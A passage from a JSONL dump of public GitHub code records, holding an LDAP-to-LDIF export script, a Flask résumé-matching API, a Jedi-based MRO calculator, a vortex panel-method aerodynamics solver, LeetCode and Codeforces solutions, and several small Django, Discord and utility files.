조회.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"21660107656","text":"#!/usr/bin/env python3\n# \n# NAME: Ldap Tool Script\n# DESC: Script to get an ldif from an LDAP Directory where uids are filtered by CSV file\n# AUTHOR: Florentin PERRIER\n# VERSION: 1.0\n\nfrom ldap3 import Server, Connection, ALL\nfrom ldap3.core.exceptions import LDAPSocketOpenError\nfrom argparse import ArgumentParser\nimport csv\nimport os.path\n\nclass pcolors:\n ERROR = '\\033[91m'\n WARNING = '\\033[93m'\n CYAN = '\\033[96m'\n END = '\\033[0m'\n GREEN = '\\033[92m'\n BOLD = '\\033[1m'\n\ndef hello ():\n print(\"LDAP TOOL SCRIPT\")\n print(\"Transfert from LDAP to LDIF\")\n\ndef info(msg):\n print(\"[INFO] \" + pcolors.CYAN + msg + pcolors.END)\ndef warn (msg):\n print(\"[WARNING] \" + pcolors.WARNING + msg + pcolors.END)\ndef error (msg):\n print(\"[ERROR] \" + pcolors.ERROR + msg + pcolors.END)\n\ndef getFilter(file):\n uids=[]\n with open(file) as csvfile:\n reader=csv.reader(csvfile, delimiter=';')\n i=None\n for row in reader:\n if(i is None):\n i=row.index('login')\n else:\n uids.append(row[i])\n return uids\n\ndef ldapToLdif(url,dn,password,filter,out):\n \n ldif=\"version: 1\\n\"\n \n try:\n file=open(out, \"x\")\n file.write(ldif)\n\n srv = Server(url, get_info=ALL)\n conn = Connection(srv, dn, password)\n conn.bind()\n\n cok=0\n cwarn=0\n\n if (filter == []):\n file.write(\"# Nothing to show\")\n else:\n for uid in filter:\n conn.search('OU=people,DC=agroparistech,DC=FR','(uid='+uid+')',attributes = ['*'])\n tmp=conn.response_to_ldif()\n for line in tmp.splitlines():\n if \"version:\" in line:\n tmp=tmp.replace(line,'')\n elif \"# total number of entries: 1\" in line:\n tmp=tmp.replace(line,'')\n if(len(tmp.splitlines())>5):\n info(\"UID=\"+uid+\": OK\")\n cok=cok+1\n else:\n warn(\"UID=\"+uid+\": ??\")\n cwarn=cwarn+1\n file.write(tmp)\n \n print('\\n'+pcolors.BOLD+pcolors.GREEN+\"Ok: \"+str(cok)+pcolors.WARNING+\"\\nWarn: \"+str(cwarn)+pcolors.END+pcolors.BOLD+\"\\nTotal: \"+str(cok+cwarn)+pcolors.END+'\\n')\n\n file.close()\n\n except FileExistsError:\n error(\"Le fichier \"+out+\" existe déjà\")\n exit(1)\n except LDAPSocketOpenError:\n error(\"Le script n'arrive pas à se connecter au serveur LDAP\")\n if (os.path.isfile(out)):\n os.remove(out)\n exit(1)\n\ndef run(args):\n\n out=\"out.ldif\"\n\n if(args.ldap_to_ldif is None):\n error(\"--ldap-to-ldif necessary\")\n exit(1)\n if(args.out is not None):\n out=args.out\n\n hello()\n ldapToLdif(args.ldap_to_ldif[0],args.ldap_to_ldif[1],args.ldap_to_ldif[2], getFilter(args.filter), out)\n info(out+\" saved!\\n[END]\")\n exit(0)\n\nparser = ArgumentParser(description=\"By Florentin PERRIER\\nv1.0.0\")\nparser.add_argument('--ldap-to-ldif', nargs=3, metavar=(\"HOST_URL\", \"DN\", \"PASSWORD\"),help=\"Get entity from ldap directory server.\\nHost URL can be: - ldap[s]://HOSTNAME.DOMAIN:PORT\")\nparser.add_argument('-f','--filter', metavar=\"CSV_FILE_IN\", help=\"Filtre UID uniquement ! Nécessite un fichier CSV : Délimiteur ';' , Une colonne avec comme 1ere valeur le mot login suivi de tout les uid.\")\nparser.add_argument('-o', '--out', metavar='OUT_FILE', help='Specify output file (For --X-to-ldif) - default: out.ldif')\nargs = parser.parse_args()\n\nrun(args)\n\n\n\n\n\n","repo_name":"FlooowW/ldap-tool-script","sub_path":"getldap.py","file_name":"getldap.py","file_ext":"py","file_size_in_byte":3584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26771949687","text":"from flask import Flask, request, jsonify\nimport os\nimport PyPDF2\nfrom docx import Document\n# imports\nimport spacy\nfrom spacy.matcher import PhraseMatcher\nfrom sklearn.metrics.pairwise import cosine_similarity # Import cosine_similarity\nfrom io import BytesIO\nimport tempfile\n\n# load default skills data base\nfrom skillNer.general_params import SKILL_DB\n# import skill extractor\nfrom skillNer.skill_extractor_class import SkillExtractor\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n#import numpy as np\n\napp = Flask(__name__)\nnlp = None\nskill_extractor = None\n\ndef initialize_nlp_and_skill_extractor():\n global nlp\n global skill_extractor\n\n if nlp is None:\n nlp = spacy.load(\"en_core_web_md\")\n skill_extractor = SkillExtractor(nlp, SKILL_DB, PhraseMatcher)\n\n\ndef extract_text_from_pdf(pdf_path):\n with open(pdf_path, 'rb') as file:\n reader = PyPDF2.PdfReader(file)\n text = ''\n for page_num in range(len(reader.pages)):\n text += reader.pages[page_num].extract_text()\n return text\n\ndef extract_text_from_docx(docx_file):\n try:\n doc = Document(docx_file)\n text = ''\n for para in doc.paragraphs:\n text += para.text + '\\n'\n return text\n except Exception as e:\n return str(e)\n\ndef extract_text_from_folder(files):\n extracted_text_dict = {} # Initialize an empty dictionary\n temp_dir = tempfile.TemporaryDirectory(prefix='pdf_temp')\n for file in files:\n filename = file.filename\n if filename.endswith('.pdf'):\n pdf_path = os.path.join(temp_dir.name, filename)\n file.save(pdf_path)\n extracted_text = extract_text_from_pdf(pdf_path)\n elif filename.endswith('.docx'):\n extracted_text = extract_text_from_docx(file)\n else:\n extracted_text = '' # Handle other file types if needed\n \n extracted_text_dict[filename] = extracted_text # Store text with filename as key\n \n return extracted_text_dict\n\n# Function to calculate skill match score (cosine similarity)\ndef calculate_skill_match_score(resume_text, job_description_text):\n # Process the text using spaCy to get document representations\n resume_doc = nlp(resume_text)\n job_description_doc = nlp(job_description_text)\n\n # Calculate cosine similarity using spaCy's built-in similarity method\n similarity = resume_doc.similarity(job_description_doc)\n\n return similarity\n\t\n@app.route('/extract-text', methods=['POST'])\ndef extract_text():\n initialize_nlp_and_skill_extractor()\n files = request.files.getlist('files') # 'files' should be the name of the input field in your HTML form\n if not files:\n return jsonify({'error': 'No files provided'})\n\n if 'job_description' not in request.form:\n return jsonify({'error': 'No job description provided'})\n\n job_description = request.form['job_description']\n\n extracted_text_dict = extract_text_from_folder(files)\n\n # Convert job description and its skills to a single text\n job_description_annotations = skill_extractor.annotate(job_description)\n job_description_annotations_list = list({match['doc_node_value'] for match in job_description_annotations['results']['full_matches']})\n job_description_text = \" \".join(job_description_annotations_list)\n\n # Create dictionaries to store skills and scores for each resume\n job_description_skills = job_description_annotations_list\n resumes_skills = {}\n resumes_scores = {}\n\n for filename, text in extracted_text_dict.items():\n # Extract skills using the SkillExtractor for each file's text\n resumes_annotations = skill_extractor.annotate(text)\n resumes_annotations_list = list({match['doc_node_value'] for match in resumes_annotations['results']['full_matches']})\n\n # Convert resume skills to a single text\n resume_text = \" \".join(resumes_annotations_list)\n\n # Calculate the skill match score (cosine similarity)\n similarity_score = calculate_skill_match_score(resume_text, job_description_text)\n cosine_similarity_score = round(similarity_score * 100, 2)\n\n resumes_skills[filename] = resumes_annotations_list\n resumes_scores[filename] = cosine_similarity_score\n \n # Clear resume_text after processing each resume\n resume_text = \"\"\n\n result_dict = {\n 'job_description_skills': job_description_skills,\n 'resumes_skills': resumes_skills,\n 'resumes_scores': resumes_scores\n }\n\n return jsonify(result_dict)\n\n\n@app.route('/', methods=['GET'])\ndef test():\n return \"test\"\n\nif __name__ == '__main__':\n app.run()","repo_name":"omar1890/hr_model","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14370560045","text":"import discord\nfrom discord.commands import slash_command, Option\nfrom utils.converters import FetchAccount\nfrom exceptions import ConnectionNotFound\nfrom utils.autocompleters import account_searcher\n\n@slash_command(\n name=\"photos\",\n description=\"Browse through a player's RecNet posts.\"\n)\nasync def photos(\n self, \n ctx: discord.ApplicationContext,\n account: Option(FetchAccount, name=\"username\", description=\"Enter RR username\", default=None, required=False, autocomplete=account_searcher)\n):\n if not account: # Check for a linked RR account\n account = await self.bot.cm.get_linked_account(self.bot.RecNet, ctx.author.id)\n if not account: raise ConnectionNotFound\n \n group = discord.utils.get(self.__cog_commands__, name='filter')\n command = discord.utils.get(group.walk_commands(), name='custom')\n await command(ctx, taken_by=account)\n\n \n \n\n \n\n \n","repo_name":"RecNetBot-Development/RecNetBot","sub_path":"cogs/image/photos.py","file_name":"photos.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36248044973","text":"text = input()\nn = len(text)\nm = int(input())\nqueries = [list(int(i) - 1 for i in input().split()) for j in range(m)]\n\nsame = [0] * n\nfor i in range(1, n):\n if text[i] == text[i - 1]:\n same[i] = same[i - 1] + 1\n else:\n same[i] = same[i - 1]\n\nfor query in queries:\n print(same[query[1]] - same[query[0]])\n","repo_name":"sharky564/Codeforces","sub_path":"CodeForces Problems 0301-0400/CodeForces Problem 0313B.py","file_name":"CodeForces Problem 0313B.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36652193259","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom . import views\ngame_list = views.GameViewSet.as_view({\n 'get': 'list',\n 'post': 'create'\n})\ngame_detail = views.GameViewSet.as_view({\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n})\n\nfrom rest_framework.routers import DefaultRouter\n\nrouter = DefaultRouter()\nrouter.register('games', views.GameViewSet)\n\nfrom rest_framework.documentation import include_docs_urls\nurlpatterns = [\n # path('games/', views.GameList.as_view(), name='game-list'),\n # path('games//', views.GameDetail.as_view(), name='game-detail'),\n path('', include(router.urls)),\n path('parser/', views.ParserView.as_view(), name='parser')\n]\n","repo_name":"karrywu123/django_restful","sub_path":"app06/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"33545243264","text":"import ast\nfrom typing import Tuple, Sequence\nfrom jedi.api.classes import Name\nfrom mrols.parsed_class import ParsedClass\nfrom mrols.parsed_package_class import ParsedPackageClass\n\n\nclass ParsedCustomClass(ParsedClass):\n \"\"\"\n This class encapsulates a class definition parsed for MRO list calculation\n and all the intermediate results during the calculation.\n\n All the necessary calculation to get the MRO list will be done during the\n initialisation of the instance.\n \"\"\"\n\n def __init__(self, jedi_name: Name, calculator: 'MROCalculator') -> None: # type: ignore\n super().__init__(jedi_name)\n self._calculator = calculator\n # attention: resolve() will raise FileNotFoundError if in Python3.5-\n # or if pass strict=True in Python3.6+\n module_path = str(jedi_name.module_path.resolve())\n # the Jedi Name should have `module_path` available\n if (not module_path):\n raise ValueError(\n \"Jedi Name's module name is not available or not registered.\")\n # load the relevant script if not yet\n if module_path not in calculator.content_cache:\n with open(module_path) as loaded_module:\n calculator.replace_content_in_cache(\n module_path, loaded_module.read())\n # update the analysis result of the relevant script if outdated\n if module_path in calculator.outdated_scripts:\n calculator.update_one(module_path)\n # the script should now be analysed and its path can be used to search\n if module_path not in calculator.jedi_scripts_by_path:\n raise ValueError(\n \"Error when loading Jedi Name's module content into Calculator.\")\n # fetch the relevant Jedi Script, get code lines and class definition\n self._jedi_script = calculator.jedi_scripts_by_path[module_path]\n self._lines = self._get_code_lines()\n self._class_def = self._get_class_def_ast_from_lines()\n # the Jedi Name should have the position information\n if self.jedi_name.line is None or self.jedi_name.column is None:\n raise ValueError(\n f'Parsed class {self.jedi_name.full_name} has no line or column information.')\n # positions with line starting with 1 (Jedi and AST standard)\n self.start_pos: Tuple[int, int] = (\n self.jedi_name.line,\n self.jedi_name.column\n )\n self.end_pos: Tuple[int, int] = (\n self.jedi_name.line,\n self.jedi_name.column + len(self._class_def.name)\n )\n # calculate the Jedi Names of the base parents\n self._base_parent_names = [\n self._jedi_script.infer(\n b.lineno + self.jedi_name.line - 1,\n b.col_offset\n )[0]\n for b in self._class_def.bases\n ] if self._class_def.bases else [self.OBJECT_CLASS]\n # refine the calculated Jedi Names of the base parents to full content\n for i, base in enumerate(self._base_parent_names):\n full_candidates = base.goto()\n if full_candidates and isinstance(full_candidates[0], Name):\n self._base_parent_names[i] = full_candidates[0]\n self._mro_parsed_list = None\n\n @property\n def mro_parsed_list(self) -> Sequence[ParsedClass]:\n if not self._mro_parsed_list:\n self._mro_parsed_list = self._get_mro_parsed_list()\n return self._mro_parsed_list\n\n def _get_code_lines(self):\n \"\"\"Get the code block of the class definition, separated by lines.\"\"\"\n # get the start and end positions and then the lines between (inclusive)\n start_pos = self.jedi_name.get_definition_start_position()\n end_pos = self.jedi_name.get_definition_end_position()\n lines = self.jedi_name.get_line_code(\n after=end_pos[0] - start_pos[0]\n ).splitlines()\n # trim the unwanted part in the first and the last lines\n # trim the last line first, otherwise the end position can be corrupted\n # when there is only one line\n lines[-1] = lines[-1][:end_pos[1]]\n lines[0] = lines[0][start_pos[1]:]\n return lines\n\n def _get_class_def_ast_from_lines(self):\n \"\"\"Get the correspondent ast.ClassDef instance.\"\"\"\n codes = '\\n'.join(self._lines)\n mod = ast.parse(codes)\n # there will be one and only one class definition\n return [n for n in mod.body if isinstance(n, ast.ClassDef)][0]\n\n def _get_base_parent_parsed(self):\n \"\"\"Get the list of base parent classes in ParseClass format.\"\"\"\n return [\n self._calculator.parsed_name_by_full_name.get(\n base_name.full_name, ParsedCustomClass(\n base_name, self._calculator)\n ) if base_name.full_name else ParsedPackageClass(base_name)\n for base_name in self._base_parent_names\n ]\n\n def _get_mro_parsed_list(self) -> Sequence[ParsedClass]:\n \"\"\"\n Calculate the MRO list in ParsedClass via the C3 Linearisation\n algorithm.\n\n Details of the algorithm can be found in the `C3 Linearisation`\n Wikipedia page.\n \"\"\"\n base_parent_parsed = self._get_base_parent_parsed()\n merge_list = [\n base_parsed.mro_parsed_list for base_parsed in base_parent_parsed]\n merge_list.append(base_parent_parsed)\n mro_parsed_list = [self] + self._merge_mro_parsed_lists(merge_list)\n return mro_parsed_list\n\n @classmethod\n def _merge_mro_parsed_lists(cls, sublists):\n \"\"\"The merge step in the C3 Linearisation algorithm to merge the MRO\n sublists (elements in ParsedClass) to one result MRO list (elements in\n ParsedClass).\n \"\"\"\n if not sublists:\n return []\n # iterate over all possible next parent class (the head)\n for i, mro_list in enumerate(sublists):\n head = mro_list[0]\n good_head = True\n # check the head candidate is not in any other list tail\n for cmp_list in sublists[:]:\n for parsed in cmp_list[1:]:\n if head == parsed:\n good_head = False\n break\n if not good_head:\n break\n # construct the remaining list to merge if the head is valid\n if good_head:\n next_list = []\n for merge_item in sublists:\n new_list = [\n item for item in merge_item\n if item != head\n ]\n if new_list:\n next_list.append(new_list)\n return [head] + cls._merge_mro_parsed_lists(next_list)\n raise TypeError('Cannot construct MRO list as conflict exists')\n","repo_name":"mosckital/python-mro-language-server","sub_path":"mrols/parsed_custom_class.py","file_name":"parsed_custom_class.py","file_ext":"py","file_size_in_byte":6876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11014529491","text":"\"\"\"Unit tests for :q_learning_frozen_lake.py.\"\"\"\nimport gym\n\nfrom labm8.py import app\nfrom labm8.py import test\nfrom learn.deep_reinforcement_learning_course import q_learning_frozen_lake\n\nFLAGS = app.FLAGS\n\n\ndef test_Train():\n \"\"\"End-to-end test.\"\"\"\n q_table = q_learning_frozen_lake.Train(\n gym.make(\"FrozenLake-v0\"),\n total_episodes=10,\n max_steps=2,\n learning_rate=0.8,\n gamma=0.95,\n init_epsilon=1.0,\n min_epsilon=0.01,\n decay_rate=0.01,\n seed=0,\n )\n assert q_table.shape == (16, 4)\n\n\nif __name__ == \"__main__\":\n test.Main()\n","repo_name":"ChrisCummins/phd","sub_path":"learn/deep_reinforcement_learning_course/q_learning_frozen_lake_test.py","file_name":"q_learning_frozen_lake_test.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":181,"dataset":"github-code","pt":"67"} +{"seq_id":"28136183125","text":"import time\nimport json\nimport uuid\nfrom datetime import datetime\nfrom collections import namedtuple\nimport redis\nimport time\nimport importlib\nimport os\nimport hashlib\nimport re\n\nfrom flask import current_app as app\n\nTask = namedtuple('Task', 'task_id task_type task_package')\n\nclass SharedModel(object):\n @staticmethod\n def import_model_class(model_class):\n class_name = re.sub(r'(?/', PartsCategory.as_view(), name='category'),\n path('part//', ShowPart.as_view(), name='part'),\n]","repo_name":"NikolayGlubokov/GlubokovNNnewPC","sub_path":"DZ for GitHub/DZ50GlubokovNN/personal_portfolio/autoparts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"24850786591","text":"\"\"\"\n超级丑数 是一个正整数,并满足其所有质因数都出现在质数数组 primes 中。\n\n给你一个整数 n 和一个整数数组 primes ,返回第 n 个 超级丑数 。\n\n题目数据保证第 n 个 超级丑数 在 32-bit 带符号整数范围内。\n\n\n\n示例 1:\n\n输入:n = 12, primes = [2,7,13,19]\n输出:32 \n解释:给定长度为 4 的质数数组 primes = [2,7,13,19],前 12 个超级丑数序列为:[1,2,4,7,8,13,14,16,19,26,28,32] 。\n示例 2:\n\n输入:n = 1, primes = [2,3,5]\n输出:1\n解释:1 不含质因数,因此它的所有质因数都在质数数组 primes = [2,3,5] 中。\n\n提示:\n\n1 <= n <= 106\n1 <= primes.length <= 100\n2 <= primes[i] <= 1000\n题目数据 保证 primes[i] 是一个质数\nprimes 中的所有值都 互不相同 ,且按 递增顺序 排列\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/super-ugly-number\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\nimport heapq\nfrom typing import List\n\n\nclass Solution:\n def nthSuperUglyNumber(self, n: int, primes: List[int]) -> int:\n # import heapq\n arr = [1]\n visited = {1}\n while n > 0:\n ugly = heapq.heappop(arr)\n for pri in primes:\n temp = ugly * pri\n if temp not in visited:\n visited.add(temp)\n heapq.heappush(arr, temp)\n n -= 1\n return ugly\n\n\nclass Solution:\n \"\"\"\n 前言\n 这道题和“264. 丑数 II”相似,区别在于,第 264 题规定丑数是只包含质因数 2、3 和 5 的正整数,\n 这道题规定超级丑数是只包含数组 primes 中的质因数的正整数。\n 这道题可以使用第 264 题的方法,包括最小堆和动态规划。\n\n 方法一:最小堆\n 要得到从小到大的第 n 个超级丑数,可以使用最小堆实现。\n 初始时堆为空。首先将最小的超级丑数 1 加入堆。\n 每次取出堆顶元素 x,则 x 是堆中最小的超级丑数。对于数组 primes 的任意质数 p,px 也是超级丑数,\n 因此将数组 primes 中的每个质数和 x 的乘积分别加入堆。\n\n 上述做法会导致堆中出现重复元素的情况。为了避免重复元素,可以使用哈希集合去重,避免相同元素多次加入堆。\n 在排除重复元素的情况下,第 n 次从最小堆中取出的元素即为第 n 个超级丑数。\n\n 作者:LeetCode-Solution\n 链接:https://leetcode-cn.com/problems/super-ugly-number/solution/chao-ji-chou-shu-by-leetcode-solution-uzff/\n 来源:力扣(LeetCode)\n 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。\n \"\"\"\n\n def nthSuperUglyNumber(self, n: int, primes: List[int]) -> int:\n seen = {1}\n heap = [1]\n\n for i in range(n):\n ugly = heapq.heappop(heap)\n for prime in primes:\n nxt = ugly * prime\n if nxt not in seen:\n seen.add(nxt)\n heapq.heappush(heap, nxt)\n\n return ugly\n","repo_name":"wanzhouyi/leetcode","sub_path":"1.数组和字符串/堆/313. 超级丑数.py","file_name":"313. 超级丑数.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"23144777836","text":"from pessoa import Pessoa\nimport random as r\n\nmarcos=Pessoa()\n\nfunc=[]\nnomes=['Jonas', 'Joaquim', 'Jorge', 'Carlos', 'Carlitos', 'José', 'Omar']\nnomes_usados=[]\n\nfor i in range(10):\n nome=nomes[r.randint(0,6)] #Pega um item aleatório da lista de nomes\n func.append(Pessoa(nome if nome not in nomes_usados else 'Nenhum'))\n #Objetos podem ser adicionados a uma lista, para criar vários\n nomes_usados.append(nome)\n print(func[i].nome, func[i].get_id())\n\n'''Criei uma lista com nomes já usados, mas tem que ser adicionado depois de instancear\na pessoa pois senão dá erro...\n\nfunc.append(Pessoa(nome se nome não está em nomes_usados, senão 'Nenhum'))\n'''\n\nfunc[5]=Pessoa() \n#Pode substituir o item da lista normalmente\n","repo_name":"ppedraum/2022","sub_path":"POO/2022-03-03/ex1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21432229683","text":"import numpy as np\nfrom numpy import zeros, pi, arctan2, sin, cos, sqrt, log, matmul, NaN, dot\nfrom numpy.linalg import inv\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom pymead import DATA_DIR\nimport os\nimport time\nfrom numba import jit\n\n\n@jit(nopython=True, cache=True)\ndef single_element_inviscid(coord: np.ndarray, alpha: float or np.float64):\n r\"\"\"\n A linear strength vortex panel method for the inviscid solution of a single airfoil, sped up using the\n just-in-time compiler in *numba*. Directly adapted from \"Program 7\" of Appendix D in [1].\n\n [1] J. Katz and and A. Plotkin, Low-Speed Aerodynamics, Second Edition, 2nd ed. New York, NY,\n USA: Cambridge University Press, 2004. Accessed: Mar. 07, 2023. [Online].\n Available: ``_\n\n Parameters\n ==========\n coord: np.ndarray\n An :math:`N \\times 2` array of airfoil coordinates, where :math:`N` is the number of coordinates, and the columns\n represent :math:`x` and :math:`y`\n\n alpha: float or np.float64\n Angle of attack of the airfoil\n\n Returns\n =======\n np.ndarray, np.ndarray, float\n The first returned array is of size :math:`(N-1) \\times 2` and represents the :math:`x` and :math:`y` locations\n of the collocation points, where :math:`N` is the number of airfoil coordinates. The second returned array is a\n one-dimensional array with length :math:`(N-1)` representing the surface pressure coefficient at each collocation\n point. The final returned value is the lift coefficient.\n \"\"\"\n\n N = len(coord) # Number of panel end points\n M = N - 1 # Number of control points\n\n EP = zeros((N, 2)) # Clockwise-defined panel end points\n EPT = zeros((N, 2)) # End points from file\n PT1 = zeros((M, 2)) # Start point of panel\n PT2 = zeros((M, 2)) # End point of panel\n CO = zeros((M, 2)) # Collocation point\n A = zeros((N, N)) # Aerodynamic influence coefficient matrix\n B = zeros((N, N)) # Tangential induced velocities (with gammas)\n TH = zeros((M,)) # Panel angle\n DL = zeros((M,)) # Panel length\n RHS = zeros((N, 1)) # Freestream component normal to panel\n V = zeros((M,)) # Panel tangential velocity\n\n ALPHA = alpha # AOA in deg\n AL = ALPHA * pi / 180\n\n EPT[:, 0] = coord[:, 0] # Read in x/c position of panel end points\n EPT[:, 1] = coord[:, 1] # Read in y/c position of panel end points\n\n # Order panel end points defined in clockwise direction\n for i in range(N):\n EP[i, 0] = EPT[N - i - 1, 0]\n EP[i, 1] = EPT[N - i - 1, 1]\n\n # Define end points of each panel (PT1 is beginning point, PT2 is end point)\n for i in range(M):\n PT1[i, 0] = EP[i, 0]\n PT2[i, 0] = EP[i+1, 0]\n PT1[i, 1] = EP[i, 1]\n PT2[i, 1] = EP[i+1, 1]\n\n # Determine local slope of each panel\n for i in range(M):\n DZ = PT2[i, 1] - PT1[i, 1]\n DX = PT2[i, 0] - PT1[i, 0]\n TH[i] = arctan2(DZ, DX)\n\n # Identify collocation points for each panel (half-panel location)\n for i in range(M):\n CO[i, 0] = (PT2[i, 0] - PT1[i, 0]) / 2 + PT1[i, 0]\n CO[i, 1] = (PT2[i, 1] - PT1[i, 1]) / 2 + PT1[i, 1]\n\n # Determine influence coefficients\n for i in range(M):\n for j in range(M):\n\n # Determine location of collocation point i in terms of panel j\n # coordinates\n XT = CO[i, 0] - PT1[j, 0]\n ZT = CO[i, 1] - PT1[j, 1]\n X2T = PT2[j, 0] - PT1[j, 0]\n Z2T = PT2[j, 1] - PT1[j, 1]\n\n X = XT*cos(TH[j]) + ZT*sin(TH[j])\n Z = -XT*sin(TH[j]) + ZT*cos(TH[j])\n X2 = X2T*cos(TH[j]) + Z2T*sin(TH[j])\n Z2 = 0\n\n # Store length of each panel (only required for first loop in i)\n if i == 0:\n DL[j] = X2\n\n # Determine radial distance and angle between corner points of jth\n # panel and ith control point\n R1 = sqrt(X**2 + Z**2)\n R2 = sqrt((X - X2)**2 + Z**2)\n TH1 = arctan2(Z, X)\n TH2 = arctan2(Z, X - X2)\n\n # Determine influence coefficient of jth panel on ith control point\n # (include consideration for self-induced velocities)\n if i == j:\n U1L = -0.5*(X - X2) / X2\n U2L = 0.5*X / X2\n W1L = -0.15916\n W2L = 0.15916\n else:\n U1L = -(Z*log(R2/R1) + X*(TH2 - TH1) - X2*(TH2 - TH1)) / (6.28319*X2)\n U2L = (Z*log(R2/R1) + X*(TH2 - TH1)) / (6.28319*X2)\n W1L = -((X2 - Z*(TH2 - TH1)) - X*log(R1/R2) + X2*log(R1/R2)) / (6.28319*X2)\n W2L = ((X2 - Z*(TH2 - TH1)) - X*log(R1/R2)) / (6.28319*X2)\n\n # Rotate coordinates back from jth panel reference frame to airfoil\n # chord frame\n U1 = U1L * np.cos(-TH[j]) + W1L * np.sin(-TH[j])\n U2 = U2L*cos(-TH[j]) + W2L*sin(-TH[j])\n W1 = -U1L*sin(-TH[j]) + W1L*cos(-TH[j])\n W2 = -U2L*sin(-TH[j]) + W2L*cos(-TH[j])\n\n # Define AIC: A(i,j) is the component of velocity normal to control\n # point i due to panel j\n # B(i,j) is the tangential velocity along control point i due to\n # panel j, used after solving for gammas\n if j == 0:\n A[i, 0] = -U1*sin(TH[i]) + W1*cos(TH[i])\n HOLDA = -U2*sin(TH[i]) + W2*cos(TH[i])\n B[i, 0] = U1*cos(TH[i]) + W1*sin(TH[i])\n HOLDB = U2*cos(TH[i]) + W2*sin(TH[i])\n elif j == M - 1:\n A[i, M - 1] = -U1*sin(TH[i]) + W1*cos(TH[i]) + HOLDA\n A[i, N - 1] = -U2*sin(TH[i]) + W2*cos(TH[i])\n B[i, M - 1] = U1*cos(TH[i]) + W1*sin(TH[i]) + HOLDB\n B[i, N - 1] = U2*cos(TH[i]) + W2*sin(TH[i])\n else:\n A[i, j] = -U1*sin(TH[i]) + W1*cos(TH[i]) + HOLDA\n HOLDA = -U2*sin(TH[i]) + W2*cos(TH[i])\n B[i, j] = U1*cos(TH[i]) + W1*sin(TH[i]) + HOLDB\n HOLDB = U2*cos(TH[i]) + W2*sin(TH[i])\n\n # Set up freestream component of boundary condition\n RHS[i, 0] = cos(AL)*sin(TH[i]) - sin(AL)*cos(TH[i])\n\n # Enforce Kutta condition\n RHS[N - 1, 0] = 0\n\n A[N - 1, 0] = 1\n A[N - 1, N - 1] = 1\n\n # Invert A matrix to solve for gammas\n G = dot(inv(A), RHS)\n\n # With known gammas, solve for CL, CPs\n CL = 0.0\n\n for i in range(M):\n VEL = 0.0\n for j in range(N):\n VEL = VEL + (B[i, j] * G[j])[0]\n V[i] = VEL + cos(AL)*cos(TH[i]) + sin(AL)*sin(TH[i])\n CL = CL + ((G[i] + G[i + 1]) * DL[i])[0]\n\n CP = 1 - V**2\n\n return CO, CP, CL\n\n\ndef main():\n # Insert airfoil points here\n coords = pd.read_csv(os.path.join(DATA_DIR, 'naca0012.dat'), skiprows=1, names=['x', 'y'], delim_whitespace=True)\n # print(coord)\n coords = coords.to_numpy()\n single_element_inviscid(coords, 4.0)\n t1 = time.time()\n CO, CP, CL = single_element_inviscid(coords, 4.0)\n t2 = time.time()\n print(f\"calculation time = {t2 - t1:.4e} seconds\")\n\n fig, axs = plt.subplots()\n axs.plot(CO[:, 0], CP)\n axs.set_xlabel(r\"$x/c$\")\n axs.set_ylabel(r\"$C_p$\")\n axs.invert_yaxis()\n print(f\"CL = {CL:.4g}\")\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"mlau154/pymead","sub_path":"pymead/analysis/single_element_inviscid.py","file_name":"single_element_inviscid.py","file_ext":"py","file_size_in_byte":7500,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"34424383535","text":"from utils.helper import WordToPDFConverter\r\nimport os\r\n\r\nclass WordToPDFApp:\r\n def __init__(self, input_path, output_path):\r\n self.input_path = input_path\r\n self.output_path = output_path\r\n \r\n def Convert(self):\r\n if __name__== '__main__':\r\n if os.path.exists(self.input_path):\r\n WordToPDFConverter.convert_word_to_pdf(self.input_path, self.output_path)\r\n else:\r\n print(f'Input word document file \"{self.input_path}\" does not exists..')\r\n\r\nif __name__== '__main__':\r\n input_path = r\"D:\\1. Data Science\\10. Projects\\Python Project\\Project\\abc.docx\"\r\n output_path = r\"D:\\1. Data Science\\10. Projects\\Python Project\\Project\\output1.pdf\"\r\n\r\n app = WordToPDFApp(input_path, output_path)\r\n\r\n app.Convert()\r\n ","repo_name":"ganeshbgunjal/Python-Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8262377114","text":"from invertiblerp import InvertibleRandomProjection\nimport numpy as np\nimport matplotlib.pyplot as plt\nclass RP():\n def run_rp(self, 